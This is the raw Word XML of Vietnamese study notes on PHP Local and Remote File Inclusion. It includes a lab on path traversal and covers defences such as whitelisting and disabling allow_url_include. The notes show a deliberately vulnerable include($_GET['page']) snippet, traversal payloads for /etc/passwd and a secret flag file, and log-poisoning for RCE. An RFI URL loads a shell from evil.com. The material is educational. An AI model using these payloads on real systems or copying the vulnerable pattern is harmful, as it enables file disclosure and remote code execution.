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FB5FD" w14:textId="505CA8D1" w:rsid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Lý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</w:p>
    <w:p w14:paraId="26CF672F" w14:textId="62C88C00" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">LFI (Local File Inclusion)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>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB64B57" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Local File Inclusion (LFI)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hổng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(include)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server)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PHP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7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>include(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C7E34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8C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>require(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C7E34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include_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>once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7E3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require_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>once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7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55753D91" w14:textId="52B07B13" w:rsidR="008C7E34" w:rsidRP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7E3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dính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LFI:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC7D259" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34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14:paraId="45DD5EAC" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>$page = $_GET['page'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5885CB1E" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>include($page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE278D" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D0040B" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41380033" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://example.com/index.php?page</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>=../../../..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C7514" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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7E3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open_basedir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, attacker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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D43DDC" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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7E3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/passwd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Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7455E03C" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">C:\Windows\win.ini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Windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D884A4C" w14:textId="402FCD21" w:rsidR="008C7E34" w:rsidRP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7E34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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096F9B0" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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E34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(config, source code)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF591A2" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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file log,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RCE (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include /var/log/apache2/access.log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PHP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inject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>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E0AC47" w14:textId="619E975C" w:rsidR="008C7E34" w:rsidRP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</w:p>
    <w:p w14:paraId="0B3DCAA8" w14:textId="34C66BCC" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. RFI (Remote File Inclusion)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>?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C943E9C" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote File Inclusion (RFI)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PHP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(qua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HTTP)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PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32CDA0" w14:textId="2AB0FFD6" w:rsidR="008C7E34" w:rsidRP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7E34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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E073CA1" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34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14:paraId="36ADCD99" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>$page = $_GET['page'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B529A5" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>include($page);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750B6838" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA1EE9" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0670A026" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>http://example.com/index.php?page=http://evil.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BC7A91" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRP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7E3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allow_url_include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= On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php.ini, PHP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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB6DF52" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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dung shell.txt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remote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A2340B" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRPr="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E3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PHP code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B34903" w14:textId="12957539" w:rsid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  <w:r w:rsidRPr="008C7E34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">RFI =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RCE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8C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34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14:paraId="56A7527B" w14:textId="77777777" w:rsid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</w:p>
    <w:p w14:paraId="25F9F023" w14:textId="56C9FB4A" w:rsidR="00904D52" w:rsidRPr="001F4A92" w:rsidRDefault="008C7E34" w:rsidP="00904D5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lab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Path traversal + LFI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257A4771" w14:textId="1DBA3C6C" w:rsidR="00904D52" w:rsidRPr="001F4A92" w:rsidRDefault="00904D52" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F4A92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1F4A92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F4A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4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="00904D52">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ữ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00904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D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04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D5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4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D52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04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D5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04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D5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04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D52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904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D52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904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D52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04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D5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04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D5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04D52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04D5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04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D5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1F4A92"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 w:rsidRPr="001F4A92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F4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A92" w:rsidRPr="001F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="001F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="001F4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9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F4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9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F4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92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1F4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4A92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1F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.</w:t>
      </w:r>
      <w:r w:rsidR="001F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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="001F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F4A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> include </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001F4A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4A9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F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4A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F4A92" w:rsidRPr="001F4A92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="001F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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="001F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4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A92" w:rsidRPr="001F4A92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1F4A92" w:rsidRPr="001F4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4A92" w:rsidRPr="001F4A9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1F4A92" w:rsidRPr="001F4A92">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pages/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D880FE8" w14:textId="0386CDB2" w:rsidR="00783EC6" w:rsidRDefault="00904D52" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904D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8DCCA0" wp14:editId="0BF0015A">
            <wp:extent cx="4410691" cy="1991003"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="210706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62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7640" w14:textId="43BE6CC3" w:rsidR="001F4A92" w:rsidRDefault="001F4A92" w:rsidP="008C7E34">
      <w:pPr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Như </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005725F4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5725F4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5725F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72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F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72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F4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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005725F4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5725F4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5725F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725F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> traversal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005725F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72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F4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572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F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72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F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725F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pages</w:t>
      </w:r>
      <w:r w:rsidR="005725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F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725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F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5725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F4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5725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F4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5725F4" w:rsidRPr="005725F4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5725F4" w:rsidRPr="005725F4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="005725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F4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5725F4" w:rsidRPr="00572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25F4" w:rsidRPr="005725F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5725F4" w:rsidRPr="005725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25F4" w:rsidRPr="005725F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725F4" w:rsidRPr="005725F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="005725F4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113DA7B0" w14:textId="2C697753" w:rsidR="005725F4" w:rsidRDefault="00D60A8F" w:rsidP="008C7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Tiến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80FFF63" w14:textId="77777777" w:rsidR="00D60A8F" w:rsidRDefault="00D60A8F" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701C28DA" w14:textId="77777777" w:rsidR="00D60A8F" w:rsidRDefault="00D60A8F" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6959C624" w14:textId="565AE733" w:rsidR="00D60A8F" w:rsidRDefault="00D60A8F" w:rsidP="008C7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path traversal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A377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77A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37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7A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37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7A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A37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7A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37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7A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A377AF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B67BB" w14:textId="14B2AD37" w:rsidR="00A377AF" w:rsidRDefault="00A377AF" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A377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ABE450" wp14:editId="3B4CC053">
            <wp:extent cx="5943600" cy="1550035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142953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33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8721" w14:textId="3791F459" w:rsidR="00A377AF" w:rsidRDefault="00A377AF" w:rsidP="006B0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7C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F937C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ../secret/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F937C0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC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6B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>include("pages/../secret/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>")</w:t>
      </w:r>
      <w:r w:rsidR="006B0D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B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>hực</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0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0DC9" w:rsidRPr="006B0DC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="006B0DC9" w:rsidRPr="006B0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0DC9" w:rsidRPr="006B0DC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B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> include("secret/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>flag.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">") → </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006B0DC9" w:rsidRPr="006B0DC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6B0DC9" w:rsidRPr="006B0D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0DC9" w:rsidRPr="006B0DC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6B0DC9" w:rsidRPr="006B0DC9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6B0DC9" w:rsidRPr="006B0DC9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6B0DC9" w:rsidRPr="006B0DC9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> pages/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E570048" w14:textId="4DFBFF98" w:rsidR="00D60A8F" w:rsidRDefault="00F937C0" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F937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89427C" wp14:editId="563C5DBA">
            <wp:extent cx="5943600" cy="1468120"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="50798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83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DC87" w14:textId="7B6F6E04" w:rsidR="006B0DC9" w:rsidRDefault="006B0DC9" w:rsidP="008C7E3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F43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88A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="00F4388A" w:rsidRPr="00F4388A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ùng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F4388A" w:rsidRPr="00F43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88A" w:rsidRPr="00F4388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F4388A" w:rsidRPr="00F43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88A" w:rsidRPr="00F4388A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F4388A" w:rsidRPr="00F438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88A" w:rsidRPr="00F4388A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="00F4388A" w:rsidRPr="00F4388A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (whitelist)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C63313" w14:textId="4707274E" w:rsidR="006B0DC9" w:rsidRPr="005725F4" w:rsidRDefault="00F4388A" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F438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7BA7C2" wp14:editId="3ADFC82B">
            <wp:extent cx="4020111" cy="1467055"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="3752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9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B6D7" w14:textId="77777777" w:rsidR="008C7E34" w:rsidRDefault="008C7E34" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FA75DDB" w14:textId="5CEF6818" w:rsidR="008C7E34" w:rsidRDefault="00FC4607" w:rsidP="008C7E3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RFI,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PHP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off</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054153E8" w14:textId="0C617A7E" w:rsidR="00FC4607" w:rsidRPr="008C7E34" w:rsidRDefault="00FC4607" w:rsidP="008C7E34">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC46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A4FCD5" wp14:editId="1A645050">
            <wp:extent cx="5943600" cy="528320"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="21351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2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3EC7" w14:textId="1DBF3EB2" w:rsidR="004E14FB" w:rsidRDefault="00FC460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hacker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RFI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1E6E262D" w14:textId="05B50353" w:rsidR="00FC4607" w:rsidRPr="008C7E34" w:rsidRDefault="00FC4607">
      <w:pPr>
        <w:rPr>
